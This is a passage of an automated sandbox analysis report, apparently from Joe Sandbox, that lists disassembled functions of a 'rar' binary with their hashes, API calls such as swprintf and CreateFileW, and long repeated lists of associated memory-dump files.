                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                • Opcode ID: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                • Instruction ID: 98c1cf7d8f5fa6b1bef1e6acb1df5ae92e37ff916b1e496c3d1deb72632769f1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70895f6a6caca5a93f387097b68bfd30b7bf4dd7af3bc8c27b3038974be86bdd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A11A7F2E5CA8355F7652135F4863792341AF55370F0846B4E97EC66D6EEACA84E4200
                                                                                                                                                                                                                                Function 00007FF6FAA37514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: wcschr$BeepMessage
                                                                                                                                                                                                                                • String ID: ($[%c]%ls
                                                                                                                                                                                                                                • API String ID: 1408639281-228076469
                                                                                                                                                                                                                                • Opcode ID: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                • Instruction ID: 24c0a2ab29db510c5c8e44d722cf04135612ffb817ff5d66c80f584eefb1b5df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d02bf8f4ce93e39c77e0184eba1caa1a1f2233ef547ea100f5889751ce62d16
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1881D932A0874182EB64CF15E4412BAA7B1FB88B88F540075EEAD97799FF3DE546C700
                                                                                                                                                                                                                                Function 00007FF6FAA46FE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: %c%c%c%c%c%c%c$%c%c%c%c%c%c%c%c%c
                                                                                                                                                                                                                                • API String ID: 233258989-622958660
                                                                                                                                                                                                                                • Opcode ID: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                • Instruction ID: eb876d13c0e7b86f20837529f6bf3ff2aea83e044f71bdd84a9e1354793f9cf9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38c4519696e4c9bdd89b4f8cc1889f7268b19d5497b88c6bb2108e0ee8c44be2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A513EF3F385848AE3548F1CE841BA926A0F364B91F545A24F95AD3B94DE3DDB498700
                                                                                                                                                                                                                                Function 00007FF6FAA36E84 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: wcschr
                                                                                                                                                                                                                                • String ID: MCAOmcao$MCAOmcao
                                                                                                                                                                                                                                • API String ID: 1497570035-1725859250
                                                                                                                                                                                                                                • Opcode ID: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                • Instruction ID: c3f9074d35b0943043254fdfa2e930e8ab9d6f8d09d2ab694b887d043cef7471
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d027c937bd85c0ec11d3272bcf654f58bd0898aa2e7cd431d5c18eddc1ac66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C41E512D0C78380F7609F24914257E5261AF16B84F9854B2EABDCA3D5FE3FE85B8721
                                                                                                                                                                                                                                Function 00007FF6FAA43528 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00007FF6FAA4359E
                                                                                                                                                                                                                                • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA435E6
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA430C8: GetFileAttributesW.KERNELBASE(00000800,00007FF6FAA4305D,?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800), ref: 00007FF6FAA430F0
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA430C8: GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF6FAA54126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF6FAA43119
                                                                                                                                                                                                                                • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA43651
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFileswprintf$CurrentProcess
                                                                                                                                                                                                                                • String ID: %u.%03u
                                                                                                                                                                                                                                • API String ID: 2814246642-1114938957
                                                                                                                                                                                                                                • Opcode ID: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                • Instruction ID: 5f6953ee039337060ac2ee8760a04c9cfb2061de38691e97990f8513429f5ca7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84c97cd936c0b2bb546c7914bc35e6a0bad55efb9bf4e2a2824d38ff43805cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A312621618A8182E7149B29E5112BAA660FB887B4F501335ED7E87BF5FF3DD50B8700
                                                                                                                                                                                                                                Function 00007FF6FAA87854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                • API String ID: 2456169464-4171548499
                                                                                                                                                                                                                                • Opcode ID: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                • Instruction ID: e949166097ce85f6f3625c10abe30d24e0d75db045748eab753bdacc2f48ab97
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dbcbed523f5bc97d8a97ee5e840f7eee38a7f1acec6aeee37cbb534f8f7503d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0941BF32B18A8186EB609F25E8443BAB7A1FB88784F804031EE5D87788EF3CD446C700
                                                                                                                                                                                                                                Function 00007FF6FAA7D7BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                • API String ID: 2280078643-1018135373
                                                                                                                                                                                                                                • Opcode ID: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                • Instruction ID: bf9fb94a7f119e7668ed1cd6866a14bcbfbe9051fb36ef378bb8bb2ec303cec5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17bbef4e125ef7202bf11184ec0650b854660f7e5235f7bad60fbeeb41854260
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21297A60864182E770DB15E04026F7761FB88BA5F001275DEAD83BD9DF3DE88ACB00
                                                                                                                                                                                                                                Function 00007FF6FAA542CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: wcschr$swprintf
                                                                                                                                                                                                                                • String ID: %c:\
                                                                                                                                                                                                                                • API String ID: 1303626722-3142399695
                                                                                                                                                                                                                                • Opcode ID: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                • Instruction ID: 323aa63c1bae22aac1b507bca4774c1c88b43f7225c99881d41083371e9585c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ec5db83852f4a6a2a7f14eb2e9108a79b2b390c2c776aa97bec8582bcc41707
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D11AE22A1878286EF206F15D5010AD6371EF55BA0B188171CFBE837E6FF3CE46A8204
                                                                                                                                                                                                                                Function 00007FF6FAA6B780 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                                                • String ID: Thread pool initialization failed.
                                                                                                                                                                                                                                • API String ID: 3340455307-2182114853
                                                                                                                                                                                                                                • Opcode ID: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                • Instruction ID: 9b1f8a99e058f657920d95d4cc63e8022425c69d74d8434ce8f2d90c1a0e3183
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d15256d0e5626b759ea638b3cf01690b973b86e734aede79ee3cd8415fd62731
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E211E632F1574182FB508F25E4453AA32A2EBD8B98F1C8035CA5D876D9EF3ED45B8780
                                                                                                                                                                                                                                Function 00007FF6FAA72984 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Exception$Throwstd::bad_alloc::bad_alloc$FileHeaderRaise
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 904936192-0
                                                                                                                                                                                                                                • Opcode ID: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                • Instruction ID: 30d68d39f1552036ea92de0c5a8d2bfb825db467f0e1b7073e99b3dcca2f8f3b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf3ffebf7957390d4581f483ab4461efbf63170567da09303d3b90ab416dc0f1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D251D172A19A8182EB50CF25D4503AD73A1FBC4B94F048235DE6E877D8EF79D51AC300
                                                                                                                                                                                                                                Function 00007FF6FAA43818 Relevance: 6.1, APIs: 4, Instructions: 129filetimeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,00000000,00000004,00000000,?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D), ref: 00007FF6FAA438CD
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D,?,?,00000000), ref: 00007FF6FAA4391F
                                                                                                                                                                                                                                • SetFileTime.KERNEL32(?,?,?,?,?,00007FF6FAA3F6FC,00000000,?,?,?,?,00007FF6FAA4097D,?,?,00000000), ref: 00007FF6FAA4399B
